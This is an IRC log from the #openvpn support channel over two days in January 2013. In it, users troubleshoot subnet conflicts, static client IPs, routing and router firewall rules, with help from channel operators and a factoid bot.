--- Day changed Tue Jan 01 2013 00:11 -!- joshie [~josh@joshie.net] has joined #openvpn 00:16 -!- brute11k [~brute11k@89.249.230.165] has joined #openvpn 01:34 -!- kyrix [~ashley@97-113-114-23.tukw.qwest.net] has joined #openvpn 01:57 -!- konigsberg7 [~mIRC@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn 02:04 -!- joshie [~josh@joshie.net] has quit [Ping timeout: 245 seconds] 02:06 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn 02:13 -!- joshie [~josh@joshie.net] has joined #openvpn 02:38 -!- kyrix [~ashley@97-113-114-23.tukw.qwest.net] has quit [Quit: Ex-Chat] 03:14 -!- konigsberg7 [~mIRC@c-67-163-13-78.hsd1.il.comcast.net] has quit [Quit: 123asdf] 03:31 -!- tyteen4a03 [T4@n218250229105.netvigator.com] has joined #openvpn 03:46 -!- sauce [sauce@unaffiliated/sauce] has quit [Ping timeout: 245 seconds] 03:51 -!- |PaSa| [lamest@2a01:7e00::f03c:91ff:feae:c042] has joined #openvpn 03:51 -!- |PaSa| [lamest@2a01:7e00::f03c:91ff:feae:c042] has quit [Client Quit] 03:51 -!- |PaSa| [lamest@2a01:7e00::f03c:91ff:feae:c042] has joined #openvpn 03:51 -!- |PaSa| [lamest@2a01:7e00::f03c:91ff:feae:c042] has left #openvpn [] 04:16 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn 04:50 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit [Ping timeout: 255 seconds] 04:50 -!- highend [~highend@46.249.58.73] has left #openvpn [] 04:56 -!- cosmicgate- [~minasan@46.228.205.104] has joined #openvpn 06:00 -!- sauce [sauce@ool-ad02adcb.dyn.optonline.net] has joined #openvpn 06:00 -!- sauce [sauce@ool-ad02adcb.dyn.optonline.net] has quit [Changing host] 06:00 -!- sauce [sauce@unaffiliated/sauce] has joined #openvpn 06:20 -!- Porkepix [~Porkepix@81-67-102-99.rev.numericable.fr] has joined #openvpn 06:46 -!- brute11k [~brute11k@89.249.230.165] has quit [Read error: Operation timed out] 06:56 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 07:00 -!- brute11k [~brute11k@89.249.230.165] has joined #openvpn 07:23 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 07:25 -!- ag4ve [~ag4ve@96.26.67.194] has quit [Ping timeout: 245 seconds] 07:27 -!- ag4ve [~ag4ve@96.26.67.194] has joined #openvpn 07:29 -!- Porkepix [~Porkepix@81-67-102-99.rev.numericable.fr] has quit [Ping timeout: 252 seconds] 07:31 -!- Porkepix [~Porkepix@81-67-102-99.rev.numericable.fr] has joined #openvpn 07:35 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 07:56 -!- awdjadj [~IceChat77@91.225.135.254] has joined #openvpn 08:01 -!- Porkepix [~Porkepix@81-67-102-99.rev.numericable.fr] has quit [Ping timeout: 255 seconds] 08:02 -!- awdjadj [~IceChat77@91.225.135.254] has quit [Quit: Hard work pays off in the future, laziness pays off now] 08:27 -!- tyteen4a03 [T4@n218250229105.netvigator.com] has quit [Read error: Connection reset by peer] 08:33 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Ping timeout: 255 seconds] 08:33 -!- cosmicgate- [~minasan@46.228.205.104] has quit [Ping timeout: 260 seconds] 08:34 -!- cosmicgate- [~minasan@46.228.205.104] has joined #openvpn 08:37 -!- tyteen4a03 [T4@n218250229105.netvigator.com] has joined #openvpn 08:59 -!- cosmicgate- [~minasan@46.228.205.104] has quit [Ping timeout: 245 seconds] 09:02 -!- cosmicgate- [~minasan@46.228.205.104] has joined #openvpn 09:12 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Ping timeout: 245 seconds] 09:14 -!- tyteen4a03 [T4@n218250229105.netvigator.com] has quit [Read error: Connection reset by peer] 09:14 -!- tyteen4a03 [~T4@n218250229105.netvigator.com] has joined #openvpn 09:37 -!- cosmicgate- [~minasan@46.228.205.104] has quit [Ping timeout: 276 seconds] 09:40 -!- afuentes [~afuentes@188.84.110.5] has joined #openvpn 09:49 -!- Porkepix [~Porkepix@81-67-100-9.rev.numericable.fr] has joined #openvpn 09:50 -!- moore1 [~moore@41.206.15.33.vgccl.net] has joined #openvpn 09:53 -!- Porkepix [~Porkepix@81-67-100-9.rev.numericable.fr] has quit [Client Quit] 10:09 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn 10:20 -!- master_of_master [~master_of@p57B5412B.dip.t-dialin.net] has quit [Ping timeout: 255 seconds] 10:22 -!- master_of_master [~master_of@p57B55644.dip.t-dialin.net] has joined #openvpn 10:33 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 10:45 -!- Porkepix [~Porkepix@81-67-100-9.rev.numericable.fr] has joined #openvpn 11:47 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 12:26 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 256 seconds] 12:29 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 255 seconds] 12:29 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 12:30 -!- moore1 [~moore@41.206.15.33.vgccl.net] has quit [Ping timeout: 252 seconds] 12:30 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 12:36 -!- ade_b [~Ade@koln-4d0dd7d8.pool.mediaWays.net] has joined #openvpn 12:36 -!- ade_b [~Ade@koln-4d0dd7d8.pool.mediaWays.net] has quit [Changing host] 12:36 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 12:42 -!- Porkepix [~Porkepix@81-67-100-9.rev.numericable.fr] has quit [Ping timeout: 255 seconds] 13:07 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has quit [Ping timeout: 240 seconds] 13:08 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 13:08 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 13:08 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 13:08 -!- mode/#openvpn [+o krzee] by ChanServ 13:27 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Quit: ByeBye] 13:31 -!- sw0rdfish [sw0rdfish@bouncing.users.since.2011.panicbnc.org] has joined #openvpn 13:57 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.225.wb.wifirst.net] has joined #openvpn 14:07 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 14:11 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Client Quit] 14:13 -!- ezhangin [~ezhangin@c-98-215-78-17.hsd1.in.comcast.net] has joined #openvpn 14:13 < ezhangin> hey guys 14:14 < ezhangin> i'm getting the possible route subnet conflict with the warning as WARNING: potential route subnet conflict between local LAN [192.168.1.0/255.255.255.0] and remote VPN [192.168.1.0/255.255.255.0] except the remote LAN should be 192.168.144.0/24 14:14 < ezhangin> no idea why it isn't showing as that 14:18 < pppingme> paste your config 14:20 < ezhangin> sure 14:20 < ezhangin> this works from my phone weirdly 14:21 < ezhangin> http://pastebin.com/pEvM0fTA 14:21 < ezhangin> if i use my phone as the internet source 14:23 < pppingme> I meant the server config.. 14:24 < ezhangin> uh it's a synology let me see how to get that 14:25 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds] 14:26 < pppingme> you've got openvpn running on a synology nas? 14:27 < ezhangin> yeah it comes preinstalled 14:27 < ezhangin> it works when i use my phone as an internet source but not this network 14:27 < ezhangin> so weird 14:27 < ezhangin> i'm actually connected to the remote network just fine but i can't get to any of the machines because it is listing a conflict 14:27 < ezhangin> which doesn't make any sense 14:28 < pppingme> when you use your phone, you don't get the message, can you get to the remote network then? 14:29 < ezhangin> i can check 14:31 < ezhangin> brb swapping internet source 14:35 -!- ezhangin [~ezhangin@c-98-215-78-17.hsd1.in.comcast.net] has quit [Ping timeout: 245 seconds] 14:35 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 14:35 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 14:35 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 14:35 -!- mode/#openvpn [+o krzee] by ChanServ 14:40 -!- pwrcycle [~pwrcycle@unaffiliated/pwrcycle] has quit [Ping timeout: 255 seconds] 14:46 -!- brute11k [~brute11k@89.249.230.165] has quit [Ping timeout: 260 seconds] 14:46 -!- pwrcycle [~pwrcycle@173.214.160.92] has joined #openvpn 14:50 -!- brute11k [~brute11k@89.249.230.165] has joined #openvpn 14:53 -!- sw0rdfish [sw0rdfish@bouncing.users.since.2011.panicbnc.org] has quit [Changing host] 14:53 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has joined #openvpn 14:53 -!- inimino [~inimino@oftn/board/inimino] has quit [Ping timeout: 248 seconds] 14:54 -!- bandroidx [~bandroidx@2607:f358:1:fed5:4:0:414:11] has quit [Excess Flood] 14:55 -!- bandroidx [~bandroidx@2607:f358:1:fed5:4:0:414:11] has joined #openvpn 14:58 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 276 seconds] 15:00 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 15:00 -!- mode/#openvpn [+v s7r] by ChanServ 15:00 -!- pwrcycle [~pwrcycle@173.214.160.92] has quit [Changing host] 15:00 -!- pwrcycle [~pwrcycle@unaffiliated/pwrcycle] has joined #openvpn 15:00 <+s7r> happy new year to all openvpn community ! ! ! 15:10 -!- ade_b [~Ade@h31-3-227-203.host.redstation.co.uk] has joined #openvpn 15:10 -!- ade_b [~Ade@h31-3-227-203.host.redstation.co.uk] has quit [Changing host] 15:10 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 15:15 < M4rc3l> happy new year s7r 15:16 -!- afuentes [~afuentes@188.84.110.5] has quit [Remote host closed the connection] 15:16 <+s7r> sa traim bine 15:20 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn [] 15:21 -!- MeanderingCode [~Meanderin@75-173-14-154.albq.qwest.net] has quit [Ping timeout: 255 seconds] 15:31 -!- m0sphere [~m0sphere@S01060018e78c9cff.cg.shawcable.net] has joined #openvpn 15:43 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.225.wb.wifirst.net] has quit [Read error: Connection reset by peer] 15:46 < m0sphere> I'm having issues with connecting to the internet from my win7 machine connected to my openvpn server and I believe it has something to do with iptables. I am unable to resolve hostnames, ping ip addresses, or do anything from the win7 machine when connected. here is my ifconfig, route -n, iptables postrouting chain and ipconfig from the windows 7 box http://pastebin.com/kE0qPv8B 15:47 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-137.28.wb.wifirst.net] has joined #openvpn 15:49 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-137.28.wb.wifirst.net] has quit [Client Quit] 16:02 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 245 seconds] 16:09 -!- MaxeyPad [~MaxeyPad@96-29-230-119.dhcp.insightbb.com] has quit [Ping timeout: 252 seconds] 16:37 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 16:38 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Read error: Connection reset by peer] 16:54 -!- inimino [~inimino@oftn/board/inimino] has joined #openvpn 16:58 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 16:58 < kisom> m0sphere: Did you enable ipv4_forwarding? :) 17:02 -!- ade_b [~Ade@koln-4d0dd7d8.pool.mediaWays.net] has joined #openvpn 17:02 -!- ade_b [~Ade@koln-4d0dd7d8.pool.mediaWays.net] has quit [Changing host] 17:02 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 17:03 -!- ade_b [~Ade@redhat/adeb] has quit [Remote host closed the connection] 17:09 < m0sphere> i figured it out 17:09 < m0sphere> client was missing comp-lzo, 17:20 -!- MaxeyPad [~MaxeyPad@96-29-230-119.dhcp.insightbb.com] has joined #openvpn 17:30 <@krzee> m0sphere, for next time: 17:30 <@krzee> !redirect 17:30 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 17:30 <@vpnHelper> http://ircpimps.org/redirect.png 17:30 <@krzee> the flowchart at the end =] 17:30 <@krzee> i was too late tho 17:32 < m0sphere> ty 17:32 <@krzee> np 17:32 < m0sphere> i'm sure this wont be the last openvpn server i set up and frustrate myself with 17:34 <@EugeneKay> !refund 17:35 -!- Porkepix [~Porkepix@dispo-82-248-141-132.adsl.proxad.net] has joined #openvpn 17:35 <@EugeneKay> D'awww, this bot doesn't know it. 17:39 -!- medusaXX [~medusaxx@vpn-147-149.vpn.uni-mannheim.de] has joined #openvpn 17:39 < medusaXX> !welcome 17:39 < medusaXX> !goal 17:39 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 17:39 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 17:39 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 17:40 < medusaXX> is there an estimate how big the openvpn bandwidth overhead is due to encryption etc? 17:44 -!- MeanderingCode [~Meanderin@75-173-14-154.albq.qwest.net] has joined #openvpn 18:05 <@krzee> not that i know of 18:05 <@krzee> ild expect it to vary a bit depending on the traffic 18:06 <@krzee> since the overhead is per packet, not per byte 18:14 < medusaXX> hm ok 18:14 < medusaXX> makes sense 18:23 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Ping timeout: 248 seconds] 18:35 -!- cosmicgate- [~minasan@216.17.109.26] has joined #openvpn 18:42 -!- hjf [~hjf@184-0-17-190.fibertel.com.ar] has quit [Ping timeout: 276 seconds] 18:42 -!- medusaXX [~medusaxx@vpn-147-149.vpn.uni-mannheim.de] has quit [] 19:11 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn 19:20 -!- hjf [~hjf@184-0-17-190.fibertel.com.ar] has joined #openvpn 19:27 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 19:40 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Quit: Leaving] 20:37 -!- cosmicgate-- [~minasan@113.210.99.116] has joined #openvpn 20:38 -!- cosmicgate- [~minasan@216.17.109.26] has quit [Ping timeout: 264 seconds] 20:50 -!- cosmicgate-- [~minasan@113.210.99.116] has quit [] 20:51 -!- cosmicgate- [~minasan@216.17.109.26] has joined #openvpn 20:52 -!- F^4 [~FFForever@unaffiliated/ffforever] has joined #openvpn 20:56 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 21:04 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Read error: Connection reset by peer] 21:05 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn 21:10 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit [Read error: Connection reset by peer] 21:10 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn 21:21 -!- dli [~dli@64.231.53.50] has quit [Remote host closed the connection] 21:39 -!- valparaiso [~valparais@ARennes-257-1-67-126.w81-53.abo.wanadoo.fr] has quit [Ping timeout: 255 seconds] 21:48 -!- staticsafe [~staticsaf@unaffiliated/staticsafe] has joined #openvpn 21:49 < staticsafe> !welcome 21:49 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 21:49 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 21:49 < staticsafe> !howto 21:49 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 21:55 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 240 seconds] 22:11 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit [Ping timeout: 255 seconds] 22:26 -!- brute11k [~brute11k@89.249.230.165] has quit [Ping timeout: 265 seconds] 22:36 -!- kyrix [~ashley@97-113-115-104.tukw.qwest.net] has joined #openvpn 22:38 < kisom> !iporder 22:38 <@vpnHelper> "iporder" is (#1) OpenVPN's internal client IP address selection algorithm works as follows: 1 -- Use --client-connect script generated file for static IP (first choice). or (#2) Use --client-config-dir file for static IP (next choice) !static for more info or (#3) Use --ifconfig-pool allocation for dynamic IP (last choice) or (#4) if you use --ifconfig-pool-persist see !ipp 22:39 < kisom> !ipp 22:39 <@vpnHelper> "ipp" is (#1) the option --ifconfig-pool-persist ipp.txt does NOT create static ips or (#2) Note that the entries in this file are treated by OpenVPN as suggestions only, based on past associations between a common name and IP address. They do not guarantee that the given common name will always receive the given IP address. If you want guaranteed assignment, see !iporder and !static 22:43 -!- gardar [~gardar@gardar.net] has quit [Remote host closed the connection] 22:46 -!- Thermi [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has quit [Remote host closed the connection] 22:48 -!- Thermi [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has joined #openvpn 22:53 -!- cosmicgate-- [~minasan@113.210.99.116] has joined #openvpn 22:54 -!- cosmicgate- [~minasan@216.17.109.26] has quit [Ping timeout: 255 seconds] 22:57 -!- cosmicgate- [~minasan@198.147.22.172] has joined #openvpn 22:57 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Remote host closed the connection] 23:02 -!- cosmicgate-- [~minasan@113.210.99.116] has quit [Ping timeout: 260 seconds] 23:04 -!- cosmicgate- [~minasan@198.147.22.172] has quit [Ping timeout: 245 seconds] 23:07 -!- cosmicgate- [~minasan@216.17.109.26] has joined #openvpn 23:13 < pppingme> !iporder 23:13 <@vpnHelper> "iporder" is (#1) OpenVPN's internal client IP address selection algorithm works as follows: 1 -- Use --client-connect script generated file for static IP (first choice). or (#2) Use --client-config-dir file for static IP (next choice) !static for more info or (#3) Use --ifconfig-pool allocation for dynamic IP (last choice) or (#4) if you use --ifconfig-pool-persist see !ipp 23:14 < pppingme> !static 23:14 <@vpnHelper> "static" is (#1) use --ifconfig-push in a ccd entry for a static ip for the vpn client or (#2) example in net30 (default): ifconfig-push 10.8.0.6 10.8.0.5 example in subnet (see !topology) or tap (see !tunortap): ifconfig-push 10.8.0.5 255.255.255.0 or (#3) also see !ccd and !iporder 23:22 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has quit [Remote host closed the connection] 23:22 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 23:22 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 23:22 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 23:22 -!- mode/#openvpn [+o krzee] by ChanServ 23:23 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn 23:29 -!- cosmicgate-- [~minasan@113.210.99.116] has joined #openvpn 23:30 -!- cosmicgate- [~minasan@216.17.109.26] has quit [Ping timeout: 276 seconds] 23:32 -!- cosmicgate- [~minasan@you.think.japan.is.cool.well.cosmicgate.is.stuck.injp.net] has joined #openvpn 23:34 -!- cosmicgate-- [~minasan@113.210.99.116] has quit [Ping timeout: 276 seconds] --- Day changed Wed Jan 02 2013 00:20 < kisom> I'm wondering how D-link is even running a business... 00:21 < kisom> Seems their recent Linux based firmware does not allow the WAN DHCP reply in iptables. So it brings down the network, and then some script runs that allows the DHCP response, and then everything is brought up again 00:22 < kisom> Which causes all connections to drop once an hour when the DHCP lease expires :D 00:22 < kisom> Do not buy Dlink! 00:22 <+pekster> Or just flash another OS like OpenWRT on it :P 00:23 <+pekster> FWIW, -m conntrack --ctstate ESTABLISHED will allow return DHCP traffic :P 00:25 < kisom> Not compatible 00:26 <+pekster> -m state --state ESTABLISHED will work too 00:26 < kisom> The problem is within the INPUT chain 00:26 < kisom> It drops traffic to the router itself 00:27 <+pekster> Sure. I don't do anything special for my DHCP traffic on my OpenWRT device. '-A INPUT -m state --state ESTABLISHED,RELATED' is good enough 00:27 <+pekster> Broken firewall rulesets are a dime a dozen 00:27 < kisom> Yeah, but this is vanilla Dlink firmware 00:27 < kisom> I just plugged it in 00:27 <+pekster> Yup 00:28 <+pekster> And this is why I run my own firewalls :P 00:28 <+pekster> I'd kinda like to find more FOSS stuff to seed just to run more connections through my hardware with 16M of RAM :P 00:29 <+pekster> DHCP leases can do fun stuff to OpenVPN too, depending on DHCP and ovpn configuration 00:48 -!- MaxeyPad_ [~MaxeyPad@74-131-67-45.dhcp.insightbb.com] has joined #openvpn 00:51 -!- MaxeyPad [~MaxeyPad@96-29-230-119.dhcp.insightbb.com] has quit [Ping timeout: 260 seconds] 01:06 -!- MeanderingCode [~Meanderin@75-173-14-154.albq.qwest.net] has quit [Read error: Connection reset by peer] 01:08 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 01:09 -!- Porkepix [~Porkepix@dispo-82-248-141-132.adsl.proxad.net] has quit [Ping timeout: 260 seconds] 01:16 -!- Porkepix [~Porkepix@dispo-82-248-141-132.adsl.proxad.net] has joined #openvpn 01:31 -!- cosmicgate-- [~minasan@113.210.99.116] has joined #openvpn 01:32 -!- cosmicgate- [~minasan@you.think.japan.is.cool.well.cosmicgate.is.stuck.injp.net] has quit [Ping timeout: 255 seconds] 01:33 -!- cosmicgate- [~minasan@you.think.japan.is.cool.well.cosmicgate.is.stuck.injp.net] has joined #openvpn 01:35 -!- cosmicgate-- [~minasan@113.210.99.116] has quit [Ping timeout: 265 seconds] 01:53 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 02:43 -!- valparaiso [~valparais@ARennes-257-1-67-126.w81-53.abo.wanadoo.fr] has joined #openvpn 02:52 -!- valparaiso [~valparais@ARennes-257-1-67-126.w81-53.abo.wanadoo.fr] has quit [Quit: valparaiso] 02:53 -!- cosmicgate-- [~minasan@113.210.99.116] has joined #openvpn 02:55 -!- cosmicgate- [~minasan@you.think.japan.is.cool.well.cosmicgate.is.stuck.injp.net] has quit [Ping timeout: 255 seconds] 03:00 -!- cosmicgate- [~minasan@you.think.japan.is.cool.well.cosmicgate.is.stuck.injp.net] has joined #openvpn 03:02 -!- cosmicgate-- [~minasan@113.210.99.116] has quit [Ping timeout: 255 seconds] 03:03 -!- cosmicgate- [~minasan@you.think.japan.is.cool.well.cosmicgate.is.stuck.injp.net] has quit [Client Quit] 03:14 -!- emate [~marcin@81.219.183.142] has joined #openvpn 03:14 < emate> Hi! I Have a problem with my ccd & ifconfig-push configuration. 03:14 <@krzee> !ifconfig-push 03:15 <@krzee> err 03:15 <@krzee> !static 03:15 <@vpnHelper> "static" is (#1) use --ifconfig-push in a ccd entry for a static ip for the vpn client or (#2) example in net30 (default): ifconfig-push 10.8.0.6 10.8.0.5 example in subnet (see !topology) or tap (see !tunortap): ifconfig-push 10.8.0.5 255.255.255.0 or (#3) also see !ccd and !iporder 03:15 < emate> I have ifconfig-push ifconfig-push 10.99.0.110 10.99.0.109 03:15 < emate> in ccd file 03:15 < emate> but, another client 03:15 -!- brute11k [~brute11k@89.249.230.92] has joined #openvpn 03:15 < emate> gets the same subnet 03:16 <@krzee> try giving static ips in a different subnet from your pool? 03:17 <@krzee> imagine this 03:17 <@krzee> if you have a dhcp network, giving ips 100-200 03:18 <@krzee> then you start plugging a bunch in 03:18 < emate> openvpn is handling dhcp 03:18 < emate> for clients 03:18 <@krzee> then you bring in a machine and program it a static ip of .100 03:18 <@krzee> what would happen? 03:18 <@krzee> but, you wouldnt do that… because you know to give static ips outside your dhcp pool 03:18 <@krzee> so do the same with openvpn 03:19 <@krzee> =] 03:19 < emate> so should i add new "route xxx.xxx.xx.xxx" line to my openvpn server 03:19 < emate> and assign addresses from this subnet? 03:19 <@krzee> you want some static and some not, right? 03:20 < emate> yes 03:20 <@krzee> yes, that is one way 03:20 <@krzee> another would be a client-connect script 03:20 <@krzee> !iporder 03:20 <@vpnHelper> "iporder" is (#1) OpenVPN's internal client IP address selection algorithm works as follows: 1 -- Use --client-connect script generated file for static IP (first choice). or (#2) Use --client-config-dir file for static IP (next choice) !static for more info or (#3) Use --ifconfig-pool allocation for dynamic IP (last choice) or (#4) if you use --ifconfig-pool-persist see !ipp 03:22 <@krzee> the first isn easier if you dont code 03:22 < emate> i already have client-connect script for iptables rules (acl), so i will use new subnet for static ips. 03:22 <@krzee> is* 03:22 <@krzee> oh ya? 03:22 <@krzee> if you already have a script which you coded it shouldnt be too hard 03:23 <@krzee> but ya the first method is quite easy too =] 03:24 < emate> if i use 'another subnet & ccd' method, will static-ip from ccd be visible in client-connect script? 03:24 <@krzee> be visible? 03:24 <@krzee> you mean like as a variable? 03:24 < emate> yes 03:24 <@krzee> no, unless you choose to read it in like any script could 03:25 <@krzee> so it wouldnt be passed by openvpn, but its quite available 03:26 < F^4> G'day 03:26 < emate> right now i assign ipbales rules for client based on ENV['ifconfig_pool_remote_ip'] 03:26 < F^4> Is it possible to vpn a vpn for a faster cross-alantic uplink? 03:27 <@krzee> if you happen to have properly positioned servers, it is possible 03:27 <@krzee> sometimes by forcing your link a certain direction you get a faster route than would have happened naturally 03:28 <@krzee> you should not EXPECT this to happen, but it can happen 03:28 <@krzee> (which i know from personal experience) 03:28 < F^4> I figure a LA vpn -> uk vpn -> web should be faster than me -> uk vpn -> web.. no? 03:28 < emate> so, if i define static-ip for client in ccd dir, will client-connect script know what ip is defined in ccd dir? 03:29 <@krzee> F^4, impossible to know, you could get lucky 03:29 <@krzee> emate, as i said, only if you tell it to look for that in your script 03:30 <@krzee> they are 2 different ways to do it, a client-connect script overrides ccd ip addressing 03:30 < emate> krzee: ok, so i have to scan ccd dir in my client-connect script, right? 03:30 <@krzee> however any script could read the info in your ccd files, so it can be done 03:30 <@krzee> right 03:30 <@krzee> or you could make a more simple method in a single file 03:31 <@krzee> since its your script, you can store the data any way you like 03:31 <@krzee> including a db if you feel so inclined 03:31 <@krzee> F^4, ill share an anecdote with ya 03:31 <@krzee> i live in the caribbean on 3rd world internet, with servers in the usa 03:32 <@krzee> i used to have a server in florida which had great international links, and great links to the usa as well 03:32 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 03:32 <@krzee> when i redirected through that server, i had a better connection to usa than if i used the normal route my ISP gave me 03:34 < F^4> I just figured 2 1gbps connections would do a better job than my 10mbps connection hehe 03:34 < F^4> brb 03:34 <@krzee> i have redirected through many servers, and have only noticed benefit with that 1 server 03:35 <@krzee> F^4, in the end its still only a 10mps connection 03:35 <@krzee> the connections are between you and the internet, not your vpn servers and the internet 03:35 -!- Devastator [~devas@unaffiliated/devastator] has quit [Read error: Connection reset by peer] 03:36 <@krzee> you're just adjusting your route (which normally adds hops and increases latency) 03:37 -!- Devastator [~devas@177.18.197.127] has joined #openvpn 03:37 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 03:37 <@krzee> however if you can test, go for it 03:38 < emate> krzee: ok, i see, i'll try to do this in client-connect script 03:39 < emate> krzee: thanks for help 03:40 -!- Devastator [~devas@177.18.197.127] has quit [Changing host] 03:40 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 03:41 < F^4> krzee, Like I said I have it all setup, but the one vpn isn't forwarding to the other one 03:44 <@krzee> emate, no problem, maybe if you get it working you could share it back on our wiki for the next guy =] 03:44 <@krzee> F^4, everything you need to understand is here: 03:44 <@krzee> !route 03:44 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide 03:45 <@krzee> but you will need to really understand it 03:45 <@krzee> and treat any subnet behind the other peer as a "lan" 03:46 <@krzee> i call what you are doing vpnchains 03:46 <@krzee> i generally dont support it, but i wrote !route after figuring out how to do it 03:47 <@krzee> !serverlan 03:47 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 03:47 <@krzee> !clientlan 